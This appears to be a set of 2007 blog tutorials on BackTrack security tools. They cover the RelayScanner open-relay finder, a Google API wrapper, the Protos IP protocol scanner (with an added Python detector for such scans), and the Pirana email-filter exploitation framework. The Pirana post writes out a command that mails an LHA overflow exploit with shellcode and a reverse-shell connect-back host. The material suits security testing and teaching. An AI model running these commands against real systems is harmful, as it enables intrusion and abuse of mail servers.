By Pavs on July 22nd, 2007
RelayScanner can search for SMTP servers, and it also locates and identifies open relay SMTP servers. It is an all-in-one program: you tell it how to scan and it does ALL of the work for you. (Website: http://www.cirt.dk/tools/).
First we have to edit the configuration file host_info.txt and enter the details of the e-mail server we want to scan. In this example I will use nano to edit the configuration file.


After editing the configuration file we just issue the command which is very simple:
RelayScanner.pl -l host_info.txt

What happened here is that RelayScanner sent fake internal e-mail to the target and prompted a ping-back response from the recipient. Only after getting a response does RelayScanner continue sending more. That is 16416 in total!! under default conditions.


RelayScanner has other options and scopes for using built-in plugins. List of options:

That’s all! Thanks for reading.
pavs
By Pavs on July 22nd, 2007
A Python wrapper for the Google web API. Allows you to do Google searches, retrieve pages from the Google cache, and ask Google for spelling suggestions.
(Source: http://sourceforge.net/projects/pygoogle/)
Ok, there is something you guys should know about Qgoogle. In order to use Qgoogle, you need a Google SOAP search API key. Unfortunately, Google has stopped issuing new API keys, according to their API site (Source). So unless you already have a key, you are out of luck with Qgoogle.
One more thing to note: when you try to run Qgoogle in Backtrack, they suggest “python googly.py <query>” in order to use it. The correct syntax is “qgoogle.py <query>”. But you have to supply the API key, assuming you have one. (I don’t have one). If you are using the latest version of Qgoogle (0.6) you can type “qgoogle.py -k <the key here>” or make a text file with the key saved in it and call it “googlekey.txt”. With the version Backtrack comes with, you have to edit qgoogle.py and change the line that says: google.LICENSE_KEY = '' . Just insert the license key between the single quotes. Like in this picture:

I used an AJAX search API key, which obviously doesn’t work.
That’s it!!
pavs
By Pavs on July 22nd, 2007
Protos is an IP protocol scanner. It goes through all possible IP protocols and uses a negative scan to sort out unsupported protocols, which the target should report using ICMP protocol unreachable messages.
Protos in action.
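A negative scan like this leaves a trace a defender can watch for: a burst of ICMP protocol unreachable replies (type 3, code 2), each quoting a different IP protocol number. The Python below is an added example, not part of Protos or the original post; it parses such replies, flags the sweep, and shows what the scanner ends up inferring. The function names, the threshold of 20 and the documentation-range addresses are assumptions, and the sample packets are constructed.

```python
import struct
from collections import defaultdict
from ipaddress import IPv4Address

ICMP_DEST_UNREACH, CODE_PROTO_UNREACH = 3, 2

def quoted_probe(icmp: bytes):
    """Return (prober, target, protocol) quoted inside an ICMP protocol
    unreachable message, or None for any other or truncated message."""
    if len(icmp) < 28 or (icmp[0], icmp[1]) != (ICMP_DEST_UNREACH, CODE_PROTO_UNREACH):
        return None
    quoted = icmp[8:]                 # header of the probe that triggered the reply
    if quoted[0] >> 4 != 4:           # only IPv4 quotes are handled here
        return None
    return (str(IPv4Address(quoted[12:16])), str(IPv4Address(quoted[16:20])), quoted[9])

def find_protocol_sweeps(messages, threshold=20):
    """Map (prober, target) to the protocol numbers reported unreachable,
    keeping only pairs that reach `threshold` (an assumed cut-off)."""
    seen = defaultdict(set)
    for msg in messages:
        probe = quoted_probe(msg)
        if probe:
            seen[probe[:2]].add(probe[2])
    return {pair: protos for pair, protos in seen.items() if len(protos) >= threshold}

def inferred_supported(unreachable):
    """Negative-scan conclusion: every protocol number NOT reported
    unreachable is treated as supported (or silently filtered)."""
    return sorted(set(range(256)) - set(unreachable))

def make_unreachable(prober, target, proto, code=CODE_PROTO_UNREACH):
    """Build a constructed ICMP unreachable message (checksums left at zero)."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28, 0, 0, 64, proto, 0,
                     IPv4Address(prober).packed, IPv4Address(target).packed)
    return struct.pack("!BBHI", ICMP_DEST_UNREACH, code, 0, 0) + ip + b"\x00" * 8

# Constructed capture: the target rejects everything except ICMP, TCP and UDP.
SAMPLE = [make_unreachable("192.0.2.10", "198.51.100.5", p)
          for p in range(256) if p not in (1, 6, 17)]
SAMPLE.append(make_unreachable("192.0.2.77", "198.51.100.5", 17, code=3))  # port unreachable: ignored

if __name__ == "__main__":
    for (prober, target), protos in find_protocol_sweeps(SAMPLE).items():
        print(f"{prober} swept {len(protos)} IP protocols on {target}")
        print("scanner infers supported:", inferred_supported(protos))
```
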
That’s all!
pavs
By Pavs on July 19th, 2007
Pirana is an exploitation framework that tests the security of an email content filter. By means of a vulnerability database, the content filter to be tested will be bombarded by various emails containing a malicious payload intended to compromise the computing platform. PIRANA’s goal is to test whether or not any vulnerability exists on the content filtering platform.
(Source: http://www.it-observer.com/tools/34/pirana_smtp_content_exploitation_framework/)
Pirana with all its options:

We will try out some of the options in Pirana. First we have to compile the exploits.

Then we will run this command: pirana.pl -e 1 -h linuxhaxor.net -a pavs@linuxhaxor.net -s 0 -l linuxhaxor.net - 80
Here -e stands for exploit, and of the six available exploits we are using exploit 1, which is “LHA get_header Directory name overflow”.
-h stands for the host name; -a stands for the destination e-mail address; -s for the shellcode type (there are 3 types available); finally -l stands for the host to connect back to in reverse shell mode.
We tried the command once with -v, to attach the EICAR virus, and once without the virus.

And the outcome:
Tada…

There are many combinations of options to play with, but you get an idea of it once you start playing around with it.
That’s all!
pavs